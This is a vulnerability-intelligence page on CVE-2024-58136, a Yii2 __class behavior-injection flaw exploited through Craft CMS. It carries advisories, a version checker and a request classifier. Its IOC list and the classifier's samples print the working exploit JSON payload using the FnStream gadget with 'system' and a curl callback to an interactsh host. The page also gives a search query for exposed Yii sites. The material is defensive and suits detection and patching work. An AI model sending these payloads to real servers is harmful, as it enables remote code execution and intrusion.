CVE-2024-58136
published 2025-04-10
Priority P1 · 90 · critical 9.8 · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2025-05-23
Exploited in the wild
EPSS 87.71% (99.7th percentile)
Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| craftcms | cms | >= 4.0.0-RC1 < 4.16.17 | 4.16.17 |
| craftcms | cms | >= 5.0.0-RC1 < 5.8.21 | 5.8.21 |
| yiiframework | yii | < 2.0.52 | 2.0.52 |
| yiisoft | yii2 | >= 0 < 2.0.52 | 2.0.52 |
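A version check against the ranges in the table above, as an added example (not the page's own code and not from the Yii or Craft CMS projects). It reads a composer.lock, compares `yiisoft/yii2` and `craftcms/cms` against those ranges with a small semver-style comparator that orders `-RC1` pre-releases before the final release (so `>= 5.0.0-RC1` behaves as the table intends), and also reports whether `guzzlehttp/psr7` is installed, because that package ships the `GuzzleHttp\Psr7\FnStream` gadget used in the in-the-wild payloads. The `yiiframework/yii` row is the same component as the composer package `yiisoft/yii2`. The lock-file content below is constructed; the helper names and the comparator are assumptions.

```python
"""Check a composer.lock against the affected ranges in the table above
(CVE-2024-58136).  Added example; not code from the page, Yii or Craft CMS.
The lock-file content is constructed."""
import json
import re

# (composer package, inclusive lower bound or None, exclusive upper bound = fixed version).
# The page's 'yiiframework/yii' row is the same component as composer's yiisoft/yii2.
AFFECTED_RANGES = [
    ("yiisoft/yii2", None, "2.0.52"),
    ("craftcms/cms", "4.0.0-RC1", "4.16.17"),
    ("craftcms/cms", "5.0.0-RC1", "5.8.21"),
]
# Package that ships the GuzzleHttp\Psr7\FnStream gadget used in the wild.
GADGET_PACKAGE = "guzzlehttp/psr7"

_PRE = re.compile(r"^([A-Za-z]+)\.?(\d*)$")


def parse_version(text):
    """Turn '5.0.0-RC1' / 'v2.0.51' into a sortable tuple, or None if unparsable.

    Pre-releases (-RC1, -beta.2) sort before the final release of the same
    core, which is what '>= 5.0.0-RC1' in the table needs."""
    core, _, pre = text.lstrip("v").partition("-")
    try:
        nums = tuple(int(p) for p in core.split("."))
    except ValueError:          # e.g. 'dev-main': cannot judge, report unknown
        return None
    if not pre:
        return nums, (0,)
    m = _PRE.match(pre)
    if not m:
        return None
    tag, num = m.groups()
    return nums, (-1, tag.lower(), int(num or 0))


def is_affected(package, version):
    """True when (package, version) lies inside one of AFFECTED_RANGES."""
    pv = parse_version(version)
    if pv is None:
        return False
    for name, low, high in AFFECTED_RANGES:
        if name != package:
            continue
        if low is not None and pv < parse_version(low):
            continue
        if pv < parse_version(high):
            return True
    return False


def check_lock(lock_text):
    """Return (affected, gadget_present) for a composer.lock document.

    affected:       list of (name, version) pairs inside a vulnerable range
    gadget_present: whether guzzlehttp/psr7 (the FnStream gadget) is installed
    """
    lock = json.loads(lock_text)
    packages = lock.get("packages", []) + lock.get("packages-dev", [])
    affected = [(p["name"], p["version"]) for p in packages
                if is_affected(p["name"], p["version"])]
    gadget_present = any(p["name"] == GADGET_PACKAGE for p in packages)
    return affected, gadget_present


# Constructed composer.lock fragment (not from a real deployment).
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "craftcms/cms", "version": "5.8.20"},
        {"name": "yiisoft/yii2", "version": "2.0.51"},
        {"name": "guzzlehttp/psr7", "version": "2.7.0"},
        {"name": "symfony/yaml", "version": "v6.4.0"},
    ],
    "packages-dev": [],
})

if __name__ == "__main__":
    affected, gadget = check_lock(SAMPLE_LOCK)
    for name, version in affected:
        print(f"VULNERABLE {name} {version}")
    print("gadget package present:", gadget)
```

Run it against a real `composer.lock` by reading the file into `check_lock`; a hit on `yiisoft/yii2` plus `gadget_present == True` means the exact in-the-wild gadget is reachable, while a hit without the gadget package still needs the upgrade, since other gadget classes may exist in the dependency set.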
Detection & IOCs (extracted from sources)
- command: {"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream":"curl {{interactsh-url}}"}}
- command: {"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}
- url: POST /index.php HTTP/1.1 (with Content-Type: application/json and a malicious __class JSON payload)
- Detect HTTP POST requests to /index.php with Content-Type: application/json whose JSON body contains the '__class' key, specifically referencing 'GuzzleHttp\Psr7\FnStream' and Yii behavior classes; this is the exploit payload pattern for CVE-2024-58136.
- Flag JSON bodies containing the key '__class' with value 'GuzzleHttp\Psr7\FnStream' combined with '_fn_close' set to 'system' or 'phpinfo'; these are the known exploit gadget chains. The callback name is attacker-chosen, so treat any '_fn_*' value alongside that class as suspect rather than matching only those two functions.
- The exploit chain requires CVE-2025-32432 to first write PHP code into a session file; CVE-2024-58136 is then triggered via a malicious JSON payload to execute that session file. Detect the combination of unusual session file creation followed by a JSON POST carrying a '__class' key.
- Post-exploitation indicator: look for newly uploaded PHP file manager files on the server following successful exploitation of this chain.
- Nuclei template flow: first confirm 'Yii' in the HTTP response body (GET /), then send the malicious JSON POST to /index.php. An HTTP callback to an interactsh URL, or 'PHP Version'/'PHP Extension' in the response body, confirms exploitation.
- FOFA/Shodan exposure query: search for title='Yii' to identify potentially vulnerable internet-facing Yii2 instances for proactive patching or monitoring.
- Craft CMS ships with Yii 2.0.51 (vulnerable) by default even after the CVE-2025-32432 patch; however, the full exploit chain is broken by the Craft CMS fix alone, and the Yii vulnerability is not independently triggerable in patched Craft CMS deployments.
- CVE-2024-58136 is a regression of CVE-2024-4990; environments that previously patched CVE-2024-4990 but have not upgraded to Yii 2.0.52 remain vulnerable.
- This vulnerability affects any product implementing the Yii framework, not just Craft CMS; detection and patching scope should extend to all Yii-based applications.
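The detection pattern described in the list above, as an added example that is not code from the page, from Yii or from Craft CMS: a small Python classifier that walks a JSON request body for `__class` keys at any depth (the in-the-wild payload nests the key under an `as hack` behavior entry, so a top-level lookup misses it) and escalates to critical when the class is the `GuzzleHttp\Psr7\FnStream` gadget and a `_fn_*` key names a dangerous PHP callback. The sample requests are constructed (the first two copy the IOC payload shape from this page); the function names, the severity levels and the list of dangerous callbacks are assumptions.

```python
"""Classify JSON request bodies for the Yii2 '__class' behavior-injection
pattern (CVE-2024-58136).  Added example; not code from the page, Yii or
Craft CMS.  The sample requests below are constructed, not captured traffic."""
import json
import re

# Gadget class used by the in-the-wild payloads listed on the page.
KNOWN_GADGET_CLASSES = {"GuzzleHttp\\Psr7\\FnStream"}
# FnStream keeps callables in '_fn_<method>' properties; the page's IOCs set '_fn_close'.
CALLBACK_KEY = re.compile(r"^_fn_\w+$")
# Assumed list of PHP callbacks worth escalating on (extend as needed).
DANGEROUS_CALLBACKS = {"system", "exec", "shell_exec", "passthru",
                       "popen", "proc_open", "phpinfo"}


def find_class_keys(node, path="$"):
    """Yield (json_path, class_name, enclosing_dict) for every '__class' key,
    at any depth.  The known payload nests it under an 'as <name>' key, so a
    top-level lookup would miss it."""
    if isinstance(node, dict):
        if "__class" in node:
            yield path, node["__class"], node
        for key, value in node.items():
            yield from find_class_keys(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from find_class_keys(value, f"{path}[{i}]")


def classify_body(raw_body):
    """Return (level, reasons); level is 'clean', 'suspicious' or 'critical'.

    suspicious: any '__class' key (an object-instantiation spec in user input)
    critical:   '__class' names a known gadget and a '_fn_*' key holds a
                dangerous callback
    """
    try:
        doc = json.loads(raw_body)
    except (TypeError, ValueError):
        return "clean", []
    level, reasons = "clean", []
    for path, cls, holder in find_class_keys(doc):
        if level == "clean":          # never downgrade an earlier 'critical'
            level = "suspicious"
        reasons.append(f"__class={cls!r} at {path}")
        if cls not in KNOWN_GADGET_CLASSES:
            continue
        for key, value in holder.items():
            if CALLBACK_KEY.match(key) and isinstance(value, str) \
                    and value in DANGEROUS_CALLBACKS:
                level = "critical"
                arg = holder.get("stream")   # IOC #1 passes the command in 'stream'
                reasons.append(f"{key}={value!r} arg={arg!r} at {path} (FnStream gadget)")
    return level, reasons


def classify_request(method, path, headers, body):
    """Apply the body check only where the payload can land: a JSON POST."""
    lowered = {k.lower(): v for k, v in headers.items()}
    ctype = lowered.get("content-type", "").split(";")[0].strip().lower()
    if method.upper() != "POST" or ctype != "application/json":
        return "clean", []
    return classify_body(body)


# Constructed samples.  The first two mirror the IOC payload shape on the page.
SAMPLES = {
    "ioc_system": r'{"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "curl {{interactsh-url}}"}}',
    "ioc_phpinfo": r'{"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}',
    "unknown_class": r'{"params": {"__class": "app\\models\\User", "name": "x"}}',
    "benign": '{"title": "Hello", "tags": ["a", "b"]}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        level, reasons = classify_request(
            "POST", "/index.php", {"Content-Type": "application/json"}, body)
        print(f"{name:14} {level:10} {'; '.join(reasons)}")
```

The 'suspicious' tier is deliberate: a `__class` key in user-supplied JSON has no legitimate reason to reach a Yii behavior configuration, so it is worth alerting on even when the class is not the FnStream gadget, which is exactly the case the page's narrower 'system'/'phpinfo' signature would miss.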
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| ghsa | | 9.1 | CRITICAL | |
| osv | | 9.1 | CRITICAL | |
| vulncheck | | 9.0 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
OSV
CVE-2025-68455 [CRITICAL] Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
osv · 2026-01-05 · CVSS 9.1
Note that attackers must have administrator access to the Craft Control Panel for this to work.
Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
Resources:
https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef
https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7
https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593
https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04
### Summary
This was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team deni
GHSA
CVE-2025-68455 [CRITICAL] CWE-470 Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
ghsa · 2026-01-05 · CVSS 9.1
(Advisory text identical to the OSV entry above.)
OSV
CVE-2024-58136 [CRITICAL] yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key
osv · 2025-04-10 · CVSS 9.1
Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025.
GHSA
CVE-2024-58136 [CRITICAL] CWE-424 yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key
ghsa · 2025-04-10 · CVSS 9.1
Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025.
VulnCheck
CVE-2025-35939 [CRITICAL] CWE-472 Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability
vulncheck · 2025 · CVSS 9.0
Craft CMS contains an external control of assumed-immutable web parameter vulnerability. This vulnerability could allow an unauthenticated client to introduce arbitrary values, such as PHP code, to a known local file location on the server. This vulnerability could be chained with CVE-2024-58136 as represented by CVE-2025-32432.
Affected vendor/product: Craft CMS / Craft CMS
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.loginsoft.com/reports/annually/vulnerability-intellige
VulnCheck
CVE-2024-58136 [CRITICAL] CWE-424 Yiiframework Yii Improper Protection of Alternate Path Vulnerability
vulncheck · 2024 · CVSS 9.0
Yii Framework contains an improper protection of alternate path vulnerability that may allow a remote attacker to execute arbitrary code. This vulnerability could affect other products that implement Yii, including—but not limited to—Craft CMS, as represented by CVE-2025-32432.
Affected vendor/product: Yiiframework / Yii
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2024-58136; https://cyberalerts.io/vulnerability/CVE-2024-58136; https://www.cve.org/CVERecord?id=CVE-2024-58136; https://sensepost.com/blog/2025/investigating-an-in-the-wild-c
CISA
CVE-2025-35939 [CRITICAL] CWE-472 Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability
cisa · 2025-06-02 · CVSS 9.8
Affected vendor/product: Craft CMS / Craft CMS
Craft CMS contains an external control of assumed-immutable web parameter vulnerability. This vulnerability could allow an unauthenticated client to introduce arbitrary values, such as PHP code, to a known local file location on the server. This vulnerability could be chained with CVE-2024-58136 as represented by CVE-2025-32432.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/craftcms/cms/pull/17220 ; https://nvd.nist.gov/vuln/detail/CVE-2025-35939
Remediation Due Date: 2025-06-23
CISA
CVE-2024-58136 [CRITICAL] CWE-424 Yiiframework Yii Improper Protection of Alternate Path Vulnerability
cisa · 2025-05-02 · CVSS 9.8
Affected vendor/product: Yiiframework / Yii
Yii Framework contains an improper protection of alternate path vulnerability that may allow a remote attacker to execute arbitrary code. This vulnerability could affect other products that implement Yii, including—but not limited to—Craft CMS, as represented by CVE-2025-32432.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. For more information, please see: https://www.yiiframework.com/news/709/please-upgrade-to-yii-2
No detection rules found.
Nuclei
CVE-2024-58136 [CRITICAL] Yii2 PHP Framework < 2.0.52 - Remote Code Execution
nuclei · CVSS 9.8
Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.
Template:
```yaml
id: CVE-2024-58136

info:
  name: Yii2 PHP Framework < 2.0.52 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.
  impact: |
    Unauthenticated attackers can exploit improper validation of the __class key in JSON behaviors to instantiate arbitrary PHP classes and achieve remote code execution.
  remediation: |
    Up
```
Wiz
CVE-2025-32433 [CRITICAL] Crying Out Cloud Newsletter - May 2025 | Wiz
blogs_wiz · 2025-05-01 · CVSS 10.0
Welcome back! This month we’ve seen a lot of action, with both vulnerabilities and security incidents that have left users affected. We bring you the latest cloud security highlights, to help you stay informed and stay secure.
Here are our top picks of cloud security highlights!
Hype or no hype – Critical Vulnerability in Erlang/OTP SSH Implementation
CVE-2025-32433 is a critical vulnerability (CVSS 10.0) in the Erlang/Open Telecom Platform (OTP) SSH implementation that allows unauthenticated remote attackers to execute arbitrary code by exploiting flaws in how the SSH protocol sequence is handled. Specifically, the vulnerability stems from the improper enforcement of message ordering, enabling attackers to send malicious SSH protocol messages before authentication and gain code executi
Checkpoint
CVE-2025-31324 28th April – Threat Intelligence Report
blogs_checkpoint · 2025-04-28
For the latest discoveries in cyber research for the week of 28th April, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
British retailer Marks & Spencer (M&S) experienced a cyber-attack that caused disruptions to its online order system and in-store contactless payments. The company suspended online orders temporarily, refunded some customers, and reported the incident to the Information Commissioner’s Office (ICO).
Yale New Haven Health (YNH
Bleepingcomputer
[CRITICAL] Craft CMS RCE exploit chain used in zero-day attacks to steal data
blogs_bleepingcomputer · 2025-04-25 · CVSS 9.0
By Lawrence Abrams
Two vulnerabilities impacting Craft CMS were chained together in zero-day attacks to breach servers and steal data, with exploitation ongoing, according to CERT Orange Cyberdefense.
The vulnerabilities were discovered by Orange Cyberdefense's CSIRT, which was called in to investigate a compromised server.
As part of the investigation, they discovered that two zero-day vulnerabilities impacting Craft CMS were exploited to breach the server:
- CVE-2025-32432: A remote code execution (RCE) vulnerability in Craft CMS.
- CVE-2024-58136: An input validation flaw in the Yii framework used by Craft CMS.
According to a report by SensePost, the ethical hacking team of Orange Cyberdefense, the threat actors ch
References
- https://github.com/yiisoft/yii2/commit/40fe496eda529fd1d933b56a1022ec32d3cd0b12
- https://github.com/yiisoft/yii2/compare/2.0.51...2.0.52
- https://github.com/yiisoft/yii2/pull/20232
- https://github.com/yiisoft/yii2/pull/20232#issuecomment-2252459709
- https://www.yiiframework.com/news/709/please-upgrade-to-yii-2-0-52
- https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-58136
Timeline
- Published: 2025-04-10
- Added to CISA KEV: 2025-05-02
- Exploited in the wild